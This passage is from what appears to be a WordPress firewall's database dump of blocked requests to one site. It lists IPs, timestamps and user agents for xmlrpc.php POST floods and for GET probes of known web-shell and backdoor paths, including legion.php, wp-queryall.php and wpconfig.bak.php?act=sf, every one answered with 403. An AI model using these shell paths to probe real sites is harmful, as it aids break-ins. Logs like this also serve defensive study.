Firefox\\/96\"}','ij8rNmFL4X0gUYPvxTAOHR1G',0,1665394197.0903,18846,'','POST',403,0,515,0,1,'',0),('120.24.52.65',2014852161,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','x9HAQGiS6Lbc3ZkY5z7mBOyP',0,1665393809.8725,19005,'','POST',403,0,515,0,1,'',0),('196.44.176.39',3291263015,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fpsnKi3tmoNYZkqyJ4AUvPb0',0,1665393462.4948,19818,'','POST',403,0,515,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IB5l3WwOHzRnFqeQjAhS8gmu',0,1665393056.6688,19483,'','POST',403,0,515,0,1,'',0),('104.219.251.247',1759247351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','coElXI1FDB6xMn7gT0AStiJj',0,1665399200.4266,18723,'','POST',403,0,515,0,1,'',0),('184.168.125.241',3098050033,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','H36VqnvMdpmETzCoO5bjx9GJ',0,1665399565.5152,17779,'','POST',403,0,515,0,1,'',0),('47.106.201.134',795527558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZHwAQIgo4qx9jeYMdOKmJTrX',0,1665398789.3797,19525,'','POST',403,0,515,0,1,'',0),('72.29.76.78',1209879630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2Q9cJuSTdKFyELtHMeRYfiXz',0,1665398018.2061,18999,'','POST',403,0,515,0,1,'',0),('194.242.56.232',3270654184,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qMzwZh8c93TmHrXsIGUBxNDR',0,1665397620.9127,18391,'','POST',403,0,515,0,1,'',0),('47.104.66.61',795361853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','z8iKATrxDspcMVtyQ56IUbWf',0,1665397244.4836,19054,'','POST',403,0,515,0,1,'',0),('185.153.8.103',3113814119,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QZwSAvH0oUx5tEOnFg6qf8hr',0,1665396850.4467,18836,'','POST',403,0,515,0,1,'',0),('116.68.196.90',1950663770,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GlCW2nfMVRg6dFUxDamXKNSj',0,1665396075.6254,19172,'','POST',403,0,515,0,1,'',0),('51.79.144.41',860852265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jrU29a0Jyebg3RHAfElQNTIi',0,1665417663.1770,19610,'','POST',403,0,515,0,1,'',0),('120.76.135.15',2018281231,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jraiVoWv9hd4y1XT0zUeR6fq',0,1665402767.7656,18785,'','POST',403,0,515,0,1,'',0),('128.199.178.73',2160570953,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HQ3INaBuVmqv4zrO2wCi6ksX',0,1665402343.3444,18523,'','POST',403,0,515,0,1,'',0),('198.12.250.252',3322739452,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mQ8F03Tn42aVft59wShpsGYR',0,1665401957.0804,18760,'','POST',403,0,515,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8RmigCZI1YBszK4uxNDMl7Ja',0,1665401544.9583,18842,'','POST',403,0,515,0,1,'',0),('103.90.235.70',1734011718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cwzCg8GmivBdbKSfVu714Lre',0,1665401147.2176,9001,'','POST',403,0,515,0,1,'',0),('35.197.5.130',600114562,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','1FBTkpeyrXlKGHEQvaWId2CS',0,1665401084.6909,579,'','POST',403,0,515,0,1,'',0),('35.197.5.130',600114562,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','S81ZPjVWa5cNmgGUd9xp0bTu',0,1665401083.5668,658,'','POST',403,0,515,0,1,'',0),('35.197.5.130',600114562,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','SbneaLBGy6o1Ac5m9z3XJQfp',0,1665401081.5329,1606,'','POST',403,0,515,0,1,'',0),('67.23.254.254',1125646078,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3zSv2849WVp1tGKPUF0RwBf7',0,1665400759.5428,18915,'','POST',403,0,515,0,1,'',0),('103.35.64.73',1730363465,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MiVdSF9hp1bcNuUjPKm6wLxg',0,1665399967.9407,18754,'','POST',403,0,515,0,1,'',0),('185.156.175.43',3114053419,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','sQWN0jOXABocVGUMIFbSzah9',0,1665417041.6989,14987,'','POST',403,0,515,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-static.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','AfB9vnqtWYeo57MjakDi0l4y',0,1665416908.3896,309,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-content/uploads/wp-queryall.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TJkt0I2CYmWP1jfG7cLZd9OS',0,1665416907.2553,290,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-queryall.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','loRdeQtChxFIvM7V851bLJO0',0,1665416906.1251,310,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','oZxUiPma8gebh5EBvTQ2sHn1',0,1665416904.9609,283,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-content/themes/twentythree/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','u8FBRVpxYIWHo65flrAgh29E',0,1665416903.3324,632,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-content/plugins/networker/networker.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','3QGRPDsZNk2Fy9CHlSziBgYT',0,1665416900.6010,1855,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-content/plugins/wp-light/wp-light.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','X6RLJxVtThjHeU7Pao9SF3AD',0,1665416898.4042,1376,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-plain.php.suspected?p=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','F2o4VRxqikMYQPleEbtjz6Nu',0,1665416888.8636,318,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-plain.php?p=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','vAOJc07nV2mGtDBE9bfjUQZx',0,1665416887.4636,316,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-system-opencloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','dFaljYrvfI9GRw7QkZsy3PgT',0,1665416886.1828,301,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-system-cloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','PKN3bROXEkTMdgB5DHA1eanL',0,1665416885.1060,287,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-shield-icon-managed.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','QDkrhwA8Rsiy5ImptjBVMOlN',0,1665416883.9615,320,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-includes/wp-system-opencloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','zFGWEoRQKqSuO3JXfnai17AU',0,1665416882.5712,415,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-includes/wp-system-cloud.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ukKgDqTsIGrJC8mE16v4BfwS',0,1665416881.2565,291,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-includes/wp-shield-icon-managed.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','9n6yLBSRlsugQp058q2GeCYJ',0,1665416879.9024,285,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-includes/system-reboot.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','krIEoOCQf4bLUdtHRGBguexp',0,1665416878.6615,274,'','GET',403,0,700,0,1,'',0),('103.57.222.214',1731845846,'','https://cteisys.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','oF3E7QUJqp4jm2KsYDckXMl0',0,1665416877.5367,294,'','GET',403,0,700,0,1,'',0),('199.188.207.230',3351039974,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cUi9g7LxHlBJmfku4ONaqTed',0,1665406753.2594,1431,'','POST',403,0,515,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lQtINsS45ne7RHr3o9LJD6qb',0,1665406314.2274,1151,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','B3eGNikwIotOSD57RvFQu9hM',0,1665405897.0502,18607,'','POST',403,0,515,0,1,'',0),('167.99.142.204',2808319692,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','LMmZJ7lCwQYcOS6bDaUx38uk',0,1665405579.8070,1824,'','POST',403,0,515,0,1,'',0),('167.99.142.204',2808319692,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','e5zRNuxkmEjVLhIcqK3dOPrQ',0,1665405578.3570,591,'','POST',403,0,515,0,1,'',0),('167.99.142.204',2808319692,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','M3LpaWovEc94wBUK7z6H5Ger',0,1665405576.9263,613,'','POST',403,0,515,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Z4VeBymqT8kSAFK0QdfLu6vM',0,1665405457.1683,1609,'','POST',403,0,515,0,1,'',0),('194.233.67.171',3270067115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2AIBcVfhQmkg8x4sjKE0qz6y',0,1665405260.0687,20222,'','POST',403,0,515,0,1,'',0),('45.137.20.41',763958313,'','http://cteisys.com/site/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Tnf1ludvxja5ELFyg8bBcer3',0,1665404950.3378,291,'','GET',403,0,700,0,1,'',0),('45.137.20.41',763958313,'','http://cteisys.com/blog/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','R8dHijN094KChFcp7VSIPxEm',0,1665404946.8197,386,'','GET',403,0,700,0,1,'',0),('45.137.20.41',763958313,'','http://cteisys.com/wordpress/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','B6LDUQNAH2i3gpdozStKnk8u',0,1665404944.0255,296,'','GET',403,0,700,0,1,'',0),('45.137.20.41',763958313,'','http://cteisys.com/wp/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','J8dpWeaHz7wZYQo6lrTgGR0j',0,1665404941.4701,314,'','GET',403,0,700,0,1,'',0),('45.137.20.41',763958313,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','giTqMDYKeESIoR2bZF17AmtU',0,1665404932.1099,6944,'','GET',403,0,700,0,1,'',0),('51.210.251.22',869464854,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uNvX6DqAtZVFIgj7h9MBTyPw',0,1665404858.9312,18504,'','POST',403,0,515,0,1,'',0),('198.12.250.252',3322739452,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Fp7Ivi06w9CdBPyZVokaYGtJ',0,1665404006.0281,18566,'','POST',403,0,515,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CpzFIjrDtSHYuRlLJNV7x4qv',0,1665404428.0146,18836,'','POST',403,0,515,0,1,'',0),('178.128.209.28',2994786588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TZbY6XtypqQ8gVxNucR3ozOj',0,1665403570.1573,19741,'','POST',403,0,515,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GKPpXtf1Fa47l29uxTM5DeOL',0,1665413711.4835,17779,'','POST',403,0,515,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sW8Ejz2xLXkQiqDMoG9w6Jv3',0,1665412808.3575,1437,'','POST',403,0,515,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','g2DltUsYX5I8OyFv6NRPLe39',0,1665412503.3525,570,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gOCyDPVSQTxs6hA5inq7JtfH',0,1665412497.0705,276,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3ibVhYCrT4vsPK7g2kLMnSeH',0,1665412494.2191,278,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Q0HlF1eSRiMKVaqIA6TsXPxn',0,1665412491.3417,288,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bin01YxCrGV2sMeUkzhAu6EZ',0,1665412490.3419,289,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','AIL3jURTmOw02X1nJ9ztDYq4',0,1665412486.0151,292,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','i9QM8xBr3yT67voKkzWfhdlG',0,1665412480.7744,335,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ktEgT1vy0pmWu6fcJ9dbA7s8',0,1665412471.4295,277,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','KMX8rtR6sEmuhBOjNaikZgVz',0,1665412468.7575,317,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XQwAlSWxDstjKZbaJC2keV3Y',0,1665412464.9175,291,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kyhZRP5WuEAavXCU3JFzL0V6',0,1665412462.7721,334,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jngdsMAGW2POXLYb0DIVCBwr',0,1665412456.8842,313,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3K0rNWoSML4gJkFP2OVRhCGf',0,1665412445.3783,287,'','GET',403,0,700,0,1,'',0),('177.52.160.32',2973016096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yjWdK1vlwc8kAMPSJn3tHRTe',0,1665410225.2365,18698,'','POST',403,0,515,0,1,'',0),('121.40.238.50',2032725554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DOVyItwlm3EqNApzgR8Xc5Zv',0,1665409340.9487,10808,'','POST',403,0,515,0,1,'',0),('162.240.216.162',2733693090,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rjBhA4JeQkRP9sntqxi27IFO',0,1665408947.6706,1254,'','POST',403,0,515,0,1,'',0),('185.83.144.103',3109261415,'','https://cteisys.com/phpinfo.php.bak','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','x2AK6bqQuLpNfVsjEoH9lXkt',0,1665408542.7032,415,'','GET',403,0,700,0,1,'',0),('185.83.144.103',3109261415,'','http://cteisys.com/phpinfo.php.bak','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','JTSnjZ0LUlVhFp5QNxkobGiR',0,1665408542.2288,664,'','GET',403,0,700,0,1,'',0),('81.68.222.69',1363467845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uS0pfxQoi1snEqI5tMhbmLgH',0,1665408481.5268,9234,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Vg85p2A9FWG7zBZ0dMxLKyfX',0,1665408061.4795,2682,'','POST',403,0,515,0,1,'',0),('157.0.140.186',2634058938,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dOaMVLscw5oCISAebpDEl6XB',0,1665407183.5880,1883,'','POST',403,0,515,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','IqM1xboK6Rkyz7cmwfUjWunV',0,1665412442.5847,444,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','http://cteisys.com/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Hf45aDNnqsIYFo30XrvR2lzL',0,1665412440.2891,278,'','GET',403,0,700,0,1,'',0),('80.76.51.29',1347171101,'','https://cteisys.com/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 